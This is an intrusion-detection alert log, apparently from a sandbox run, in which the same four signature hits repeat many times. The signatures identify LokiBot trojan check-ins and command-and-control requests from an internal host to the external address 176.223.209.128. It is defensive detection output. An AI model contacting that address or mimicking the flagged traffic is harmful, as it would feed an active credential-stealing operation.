                                              11/25/21-10:49:17.213581TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997180192.168.11.20176.223.209.128
                                              11/25/21-10:49:17.213581TCP2025381ET TROJAN LokiBot Checkin4997180192.168.11.20176.223.209.128
                                              11/25/21-10:49:17.213581TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997180192.168.11.20176.223.209.128
                                              11/25/21-10:49:17.716881TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997280192.168.11.20176.223.209.128
                                              11/25/21-10:49:17.716881TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997280192.168.11.20176.223.209.128
                                              11/25/21-10:49:17.716881TCP2025381ET TROJAN LokiBot Checkin4997280192.168.11.20176.223.209.128
                                              11/25/21-10:49:17.716881TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997280192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.186520TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997380192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.186520TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997380192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.186520TCP2025381ET TROJAN LokiBot Checkin4997380192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.186520TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997380192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.695896TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997480192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.695896TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997480192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.695896TCP2025381ET TROJAN LokiBot Checkin4997480192.168.11.20176.223.209.128
                                              11/25/21-10:49:18.695896TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997480192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.208676TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997580192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.208676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997580192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.208676TCP2025381ET TROJAN LokiBot Checkin4997580192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.208676TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997580192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.734180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997680192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.734180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997680192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.734180TCP2025381ET TROJAN LokiBot Checkin4997680192.168.11.20176.223.209.128
                                              11/25/21-10:49:19.734180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997680192.168.11.20176.223.209.128
                                              11/25/21-10:49:20.231014TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997780192.168.11.20176.223.209.128
                                              11/25/21-10:49:20.231014TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997780192.168.11.20176.223.209.128
                                              11/25/21-10:49:20.231014TCP2025381ET TROJAN LokiBot Checkin4997780192.168.11.20176.223.209.128
                                              11/25/21-10:49:20.231014TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997780192.168.11.20176.223.209.128
                                              11/25/21-10:49:20.695066TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997880192.168.11.20176.223.209.128
                                              11/25/21-10:49:20.695066TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997880192.168.11.20176.223.209.128
                                              11/25/21-10:49:20.695066TCP2025381ET TROJAN LokiBot Checkin4997880192.168.11.20176.223.209.128
                                              11/25/21-10:49:20.695066TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997880192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.204317TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997980192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.204317TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997980192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.204317TCP2025381ET TROJAN LokiBot Checkin4997980192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.204317TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997980192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.725257TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998080192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.725257TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998080192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.725257TCP2025381ET TROJAN LokiBot Checkin4998080192.168.11.20176.223.209.128
                                              11/25/21-10:49:21.725257TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998080192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.161051TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998180192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.161051TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998180192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.161051TCP2025381ET TROJAN LokiBot Checkin4998180192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.161051TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998180192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.694084TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998280192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.694084TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998280192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.694084TCP2025381ET TROJAN LokiBot Checkin4998280192.168.11.20176.223.209.128
                                              11/25/21-10:49:22.694084TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998280192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.236990TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998380192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.236990TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998380192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.236990TCP2025381ET TROJAN LokiBot Checkin4998380192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.236990TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998380192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.750984TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998480192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.750984TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998480192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.750984TCP2025381ET TROJAN LokiBot Checkin4998480192.168.11.20176.223.209.128
                                              11/25/21-10:49:23.750984TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998480192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.261506TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998580192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.261506TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998580192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.261506TCP2025381ET TROJAN LokiBot Checkin4998580192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.261506TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998580192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.765311TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998680192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.765311TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998680192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.765311TCP2025381ET TROJAN LokiBot Checkin4998680192.168.11.20176.223.209.128
                                              11/25/21-10:49:24.765311TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998680192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.270321TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998780192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.270321TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998780192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.270321TCP2025381ET TROJAN LokiBot Checkin4998780192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.270321TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998780192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.783039TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998880192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.783039TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998880192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.783039TCP2025381ET TROJAN LokiBot Checkin4998880192.168.11.20176.223.209.128
                                              11/25/21-10:49:25.783039TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998880192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.316918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998980192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.316918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998980192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.316918TCP2025381ET TROJAN LokiBot Checkin4998980192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.316918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998980192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.841395TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999080192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.841395TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999080192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.841395TCP2025381ET TROJAN LokiBot Checkin4999080192.168.11.20176.223.209.128
                                              11/25/21-10:49:26.841395TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999080192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.357926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999180192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.357926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999180192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.357926TCP2025381ET TROJAN LokiBot Checkin4999180192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.357926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999180192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.861743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999280192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.861743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999280192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.861743TCP2025381ET TROJAN LokiBot Checkin4999280192.168.11.20176.223.209.128
                                              11/25/21-10:49:27.861743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999280192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.402901TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999380192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.402901TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999380192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.402901TCP2025381ET TROJAN LokiBot Checkin4999380192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.402901TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999380192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.926178TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999480192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.926178TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999480192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.926178TCP2025381ET TROJAN LokiBot Checkin4999480192.168.11.20176.223.209.128
                                              11/25/21-10:49:28.926178TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999480192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.395169TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999580192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.395169TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999580192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.395169TCP2025381ET TROJAN LokiBot Checkin4999580192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.395169TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999580192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.871513TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999680192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.871513TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999680192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.871513TCP2025381ET TROJAN LokiBot Checkin4999680192.168.11.20176.223.209.128
                                              11/25/21-10:49:29.871513TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999680192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.393507TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999780192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.393507TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999780192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.393507TCP2025381ET TROJAN LokiBot Checkin4999780192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.393507TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999780192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.922836TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999880192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.922836TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999880192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.922836TCP2025381ET TROJAN LokiBot Checkin4999880192.168.11.20176.223.209.128
                                              11/25/21-10:49:30.922836TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999880192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.432081TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999980192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.432081TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999980192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.432081TCP2025381ET TROJAN LokiBot Checkin4999980192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.432081TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999980192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.950901TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000080192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.950901TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000080192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.950901TCP2025381ET TROJAN LokiBot Checkin5000080192.168.11.20176.223.209.128
                                              11/25/21-10:49:31.950901TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000080192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.411503TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000180192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.411503TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000180192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.411503TCP2025381ET TROJAN LokiBot Checkin5000180192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.411503TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000180192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.838212TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000280192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.838212TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000280192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.838212TCP2025381ET TROJAN LokiBot Checkin5000280192.168.11.20176.223.209.128
                                              11/25/21-10:49:32.838212TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000280192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.371009TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000380192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.371009TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000380192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.371009TCP2025381ET TROJAN LokiBot Checkin5000380192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.371009TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000380192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.891069TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000480192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.891069TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000480192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.891069TCP2025381ET TROJAN LokiBot Checkin5000480192.168.11.20176.223.209.128
                                              11/25/21-10:49:33.891069TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000480192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.420369TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000580192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.420369TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000580192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.420369TCP2025381ET TROJAN LokiBot Checkin5000580192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.420369TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000580192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.921609TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000680192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.921609TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000680192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.921609TCP2025381ET TROJAN LokiBot Checkin5000680192.168.11.20176.223.209.128
                                              11/25/21-10:49:34.921609TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000680192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.381645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000780192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.381645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000780192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.381645TCP2025381ET TROJAN LokiBot Checkin5000780192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.381645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000780192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.899719TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000880192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.899719TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000880192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.899719TCP2025381ET TROJAN LokiBot Checkin5000880192.168.11.20176.223.209.128
                                              11/25/21-10:49:35.899719TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000880192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.430850TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000980192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.430850TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000980192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.430850TCP2025381ET TROJAN LokiBot Checkin5000980192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.430850TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000980192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.941067TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001080192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.941067TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001080192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.941067TCP2025381ET TROJAN LokiBot Checkin5001080192.168.11.20176.223.209.128
                                              11/25/21-10:49:36.941067TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001080192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.484066TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001180192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.484066TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001180192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.484066TCP2025381ET TROJAN LokiBot Checkin5001180192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.484066TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001180192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.955485TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001280192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.955485TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001280192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.955485TCP2025381ET TROJAN LokiBot Checkin5001280192.168.11.20176.223.209.128
                                              11/25/21-10:49:37.955485TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001280192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.463778TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001380192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.463778TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001380192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.463778TCP2025381ET TROJAN LokiBot Checkin5001380192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.463778TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001380192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.976726TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001480192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.976726TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001480192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.976726TCP2025381ET TROJAN LokiBot Checkin5001480192.168.11.20176.223.209.128
                                              11/25/21-10:49:38.976726TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001480192.168.11.20176.223.209.128
                                              11/25/21-10:49:39.500286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001580192.168.11.20176.223.209.128
                                              11/25/21-10:49:39.500286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001580192.168.11.20176.223.209.128
                                              11/25/21-10:49:39.500286TCP2025381ET TROJAN LokiBot Checkin5001580192.168.11.20176.223.209.128
                                              11/25/21-10:49:39.500286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001580192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.035714TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001680192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.035714TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001680192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.035714TCP2025381ET TROJAN LokiBot Checkin5001680192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.035714TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001680192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.546893TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001780192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.546893TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001780192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.546893TCP2025381ET TROJAN LokiBot Checkin5001780192.168.11.20176.223.209.128
                                              11/25/21-10:49:40.546893TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001780192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.083152TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001880192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.083152TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001880192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.083152TCP2025381ET TROJAN LokiBot Checkin5001880192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.083152TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001880192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.586027TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001980192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.586027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001980192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.586027TCP2025381ET TROJAN LokiBot Checkin5001980192.168.11.20176.223.209.128
                                              11/25/21-10:49:41.586027TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001980192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.108784TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002080192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.108784TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002080192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.108784TCP2025381ET TROJAN LokiBot Checkin5002080192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.108784TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002080192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.628958TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002180192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.628958TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002180192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.628958TCP2025381ET TROJAN LokiBot Checkin5002180192.168.11.20176.223.209.128
                                              11/25/21-10:49:42.628958TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002180192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.093221TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002280192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.093221TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002280192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.093221TCP2025381ET TROJAN LokiBot Checkin5002280192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.093221TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002280192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.580124TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002380192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.580124TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002380192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.580124TCP2025381ET TROJAN LokiBot Checkin5002380192.168.11.20176.223.209.128
                                              11/25/21-10:49:43.580124TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002380192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.062925TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002480192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.062925TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002480192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.062925TCP2025381ET TROJAN LokiBot Checkin5002480192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.062925TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002480192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.593789TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002580192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.593789TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002580192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.593789TCP2025381ET TROJAN LokiBot Checkin5002580192.168.11.20176.223.209.128
                                              11/25/21-10:49:44.593789TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002580192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.081557TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002680192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.081557TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002680192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.081557TCP2025381ET TROJAN LokiBot Checkin5002680192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.081557TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002680192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.567535TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002780192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.567535TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002780192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.567535TCP2025381ET TROJAN LokiBot Checkin5002780192.168.11.20176.223.209.128
                                              11/25/21-10:49:45.567535TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002780192.168.11.20176.223.209.128
                                              11/25/21-10:49:46.099241TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002980192.168.11.20176.223.209.128
                                              11/25/21-10:49:46.099241TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002980192.168.11.20176.223.209.128
                                              11/25/21-10:49:46.099241TCP2025381ET TROJAN LokiBot Checkin5002980192.168.11.20176.223.209.128
                                              11/25/21-10:49:46.099241TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002980192.168.11.20176.223.209.128
                                              11/25/21-10:49:46.560009TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003080192.168.11.20176.223.209.128
                                              11/25/21-10:49:46.560009TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003080192.168.11.20176.223.209.128
